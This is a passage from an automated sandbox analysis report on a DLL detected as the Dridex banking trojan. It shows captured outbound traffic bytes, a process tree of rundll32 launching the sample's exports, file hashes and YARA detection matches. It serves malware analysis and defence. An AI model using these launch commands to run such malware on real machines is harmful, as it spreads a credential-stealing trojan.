                                                                                                      2021-10-28 03:10:02 UTC464OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:10:03 UTC469INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:10:03 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: loaddll32.exe PID: 7028 Parent PID: 4728

                                                                                                      General

                                                                                                      Start time:05:05:59
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll'
                                                                                                      Imagebase:0xfd0000
                                                                                                      File size:893440 bytes
                                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.790137281.0000000001120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1193417410.000000006E4C1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate

                                                                                                      Analysis Process: cmd.exe PID: 7064 Parent PID: 7028

                                                                                                      General

                                                                                                      Start time:05:06:00
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                                                                                                      Imagebase:0x11d0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 7084 Parent PID: 7028

                                                                                                      General

                                                                                                      Start time:05:06:00
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Bluewing
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.765489662.0000000004670000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 7096 Parent PID: 7064

                                                                                                      General

                                                                                                      Start time:05:06:00
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.1194868368.000000006E4C1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.766529856.0000000002F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 3096 Parent PID: 7028

                                                                                                      General

                                                                                                      Start time:05:06:04
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Earth
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.779791327.0000000002D40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 6168 Parent PID: 7028

                                                                                                      General

                                                                                                      Start time:05:06:09
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Masterjust
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.787445513.0000000004440000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >